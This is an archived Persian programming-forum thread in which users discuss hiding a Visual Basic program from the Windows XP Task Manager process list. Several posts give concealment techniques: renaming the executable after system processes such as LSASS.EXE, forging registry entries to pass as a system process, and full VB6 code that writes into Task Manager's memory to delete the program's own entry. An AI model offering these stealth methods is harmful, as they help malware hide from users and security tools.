PDA

View Full Version : Processes در ویندوز XP

Ariyan
شنبه 02 آبان 1383, 07:53 صبح
چه جوری میشه برنامه رو از تب Processes در Task Managerویندوز XP مخفی کرد ؟

vbprogramer
شنبه 02 آبان 1383, 09:13 صبح
اینو داشتم :متفکر:
باید برم بگردم دنبالش

امیدوارم پیداش کنم

پس فعلاْ......

Ariyan
جمعه 15 آبان 1383, 07:12 صبح
ممنون :flower: :flower:

Payam Moradi
جمعه 15 آبان 1383, 10:13 صبح
سلام
جناب آریان با این دستور :

App.TaskVisible = False

موفق باشید :flower:

Ariyan
جمعه 15 آبان 1383, 12:17 عصر
ممنون ولی:
منظورم از تب Processes است نه از تب Applications.

hmm
شنبه 16 آبان 1383, 07:27 صبح
اگه شما با وی بی برنامه نویسی میکنید با استفاده از دستور فوق میتوانید برنامه خود را از لیست task مخفی کنید ولی اگه شما برنامه ای دارید که از قبل نوشته شده و اجرایی است باید یک فکر دیگه ای بکنید

Ariyan
شنبه 16 آبان 1383, 14:52 عصر
اگه شما با وی بی برنامه نویسی میکنید با استفاده از دستور فوق میتوانید برنامه خود را از لیست task مخفی کنید ولی اگه شما برنامه ای دارید که از قبل نوشته شده و اجرایی است باید یک فکر دیگه ای بکنید

منظور من TaskManager ویندوز XP است ودستور فوق فقط برنامه را از تب Applications مخفی میکند نه از تب Processes در ویندوز98 وME با تابع RegisterServiceProcess متوان این کار را انجام داد ولی این تابع در ویندوز های NT وجود ندارد.

Best Programmer
شنبه 16 آبان 1383, 15:44 عصر
ببخشید دوست عزیز. در این باره قبلا زیاد بحث شده .ژ

http://www.barnamenevis.org/forum/viewtopic.php?t=10371

Ariyan
پنج شنبه 01 اردیبهشت 1384, 07:56 صبح
ببخشید دوست عزیز. در این باره قبلا زیاد بحث شده .ژ

http://www.barnamenevis.org/forum/viewtopic.php?t=10371

مبحث فوق در مورد جلوگیری از Terminate یک Process است نه در مورد جلوگیری از نمایش آن!
من میخواهم از نمایش آن در لیست Process های TaskManager جلوگیری کنم!
با عرض تشکر

Ariyan
جمعه 02 اردیبهشت 1384, 08:18 صبح
نظری ندارید؟

R_BABAZADEH
جمعه 02 اردیبهشت 1384, 14:06 عصر
اگه قول بدی با هاش کار ناجور نکنی اینم یه نمونه بر نامه

armin_izer
جمعه 02 اردیبهشت 1384, 14:22 عصر
Ariyan joon:

با همون دستور مشکل شما حل میشه و برنامتون تو لیست Proccess ها مخفی میشه.

App.TaskVisible=False

sohrab o
جمعه 13 بهمن 1385, 13:44 عصر
چرا کسی جواب نداده ؟

sjj
جمعه 13 بهمن 1385, 20:39 عصر
ببینید این برنامه مشکلتون رو حل میکنه ؟
6743

MM_Mofidi
شنبه 14 بهمن 1385, 09:21 صبح
این برنامه کلک رشتیه با SendMessage فقط هر بار به taskman میگه نمایش نده اگر نرخ بروز رسانی را بالا ببریم یا از طریق برنامههای غیر از taskman ببینیم جواب نمیدهد. راه حل اصولی دارد.

mjelecom
شنبه 14 بهمن 1385, 15:18 عصر
اگه می خوای برنامت هیچ جوری بسته نشه ، یه سورس داشتم این کارو می کرد. اگه به کارت میاد، بگو بگردم انشا الله پیداش می کنم.

sjj
شنبه 14 بهمن 1385, 22:34 عصر
این برنامه کلک رشتیه با SendMessage فقط هر بار به taskman میگه نمایش نده اگر نرخ بروز رسانی را بالا ببریم یا از طریق برنامههای غیر از taskman ببینیم جواب نمیدهد. راه حل اصولی دارد.
کاملا حق با شماست.بنده هم اصلا یادم نیست این سورس کد رو از کجا گرفتم!

aminbrleevb
شنبه 05 مرداد 1387, 21:11 عصر
اگه می خوای برنامت هیچ جوری بسته نشه ، یه سورس داشتم این کارو می کرد. اگه به کارت میاد، بگو بگردم انشا الله پیداش می کنم.

ممنون میشم این برنامه رو بزارین
من برنامه ای می خوام که نتونیم ار task ببندیمش مثل اغلب انتی ویروس ها
ممنون میشم کمک کنید

.:KeihanCPU:.
شنبه 05 مرداد 1387, 23:38 عصر
Ariyan joon:

با همون دستور مشکل شما حل میشه و برنامتون تو لیست Proccess ها مخفی میشه.

App.TaskVisible=False

نمیشه!!!
فقط در لیست App ها نمایش داده نمیشه

دوستان اگه سورسی در اختیار دارن بذارن دیگه تا همه استفاده کنن.

مهران رسا
یک شنبه 06 مرداد 1387, 08:39 صبح
یه راه ساده اینه که اسم فایل exe رو به نام هایی مثل : LSASS.EXE - CSRSS.EXE - SMSS.EXE -SERVICES.EXE تغییر بدی . البته بزرگ و کوچک بودن نام فایل تاثیری در روند کار نداره ...

البته این راه یه جور کلک به حساب میاد .

من یه پیشنهاد دیگه دارم . یه برنامه قدرتمند که دارای پروسه های سیستمی هست رو روی سیستم تون نصب کنید . (مثل آنتی ویروس NOD32 ) . بعد توی TaskManager پروسه سیستمی مربوط به اون رو پیدا کنید . مثلاً ekrn.exe .

حالا Regedit رو باز کنید و نام فایل مربوطه رو جستجو کنید و مسیر هایی که پیدا شده رو ثبت کنید .
در آخر سعی کنید خودتون چنین مسیر هایی رو در رجیستری ایجاد کنید و برنامه تون رو سیستمی کنید ..

موفق باشید

یک شنبه 06 مرداد 1387, 09:25 صبح
یه راه ساده اینه که اسم فایل exe رو به نام هایی مثل : LSASS.EXE - CSRSS.EXE - SMSS.EXE -SERVICES.EXE تغییر بدی

چرا سازندگان آنتی ویروسها نمیان برنامه های با این اسم رو ویروس به حساب بیارن؟

drwatson
یک شنبه 06 مرداد 1387, 09:27 صبح
اینو از همین سایت گرفتم

--------------------------------------------------------
تو قسمت General

کد:
Private Type bkhflag As Longpsz As LonglParam As Longpt As LongvkDirection As LongEnd TypePrivate Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPrivate Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPrivate Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As LongPrivate Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As LongPrivate Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As LongPrivate Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate Declare Function GetCurrentProcessId Lib "kernel32.dll" () As LongPrivate Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As LongPrivate Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPrivate Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
--------------------------------------------------------------------------

تو General نباشه :

کد:
Private Sub Hide_Process(Name As String)Dim pName As LongDim pType As LongDim l As LongDim Tid As LongDim hTid As LongDim pid As LongDim h As LongDim i As LongDim hProcess As LongDim f As bkhDim s As StringDim bkh() As Byteh = FindWindow(vbNullString, "Windows Task Manager")KillTimer h, 0h = FindWindowEx(h, 0, "#32770", vbNullString)h = FindWindowEx(h, 0, "SysListView32", vbNullString)If h = 0 Then Exit Subf.flag = 8 Or &H20Call GetWindowThreadProcessId(h, pid)hProcess = OpenProcess(1082, 0, pid)bkh = StrConv(Name, vbFromUnicode)pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), lf.psz = pNamepType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), li = SendMessage(h, &H1000 + 13, 0, pType)If i <> -1 Then SendMessage h, &H1000 + 8, i, 0VirtualFreeEx hProcess, pType, Len(f), &H8000VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000End Sub
--------------------------------------------------------------------------

حالا یه تایمر 5 ثانیه بذارید و ...

کد:
Hide_Process CStr(App.EXEName & ".exe")
-------------------------------------------------------------------------

یک شنبه 06 مرداد 1387, 19:52 عصر
اینو از همین سایت گرفتم
این کد فقط برنامه رو از دید TaskMgr مخفی میکنه
با برنامه های مدیریت پروسه امتحان کنید

drwatson
دوشنبه 07 مرداد 1387, 02:01 صبح
این کد فقط برنامه رو از دید TaskMgr مخفی میکنه
با برنامه های مدیریت پروسه امتحان کنید:متفکر:

به سوال دقت کنید

چه جوری میشه برنامه رو از تب Processes در Task Managerویندوز XP مخفی کرد ؟
جوابشم همونیه که گفتم:لبخند:

مهران رسا
دوشنبه 07 مرداد 1387, 07:48 صبح
چرا سازندگان آنتی ویروسها نمیان برنامه های با این اسم رو ویروس به حساب بیارن؟

مطمئناً راه های بهتر و مطمئن تری برای شناسایی ویروس ها وجود داره که دیگه نیازی به این کار نباشه ...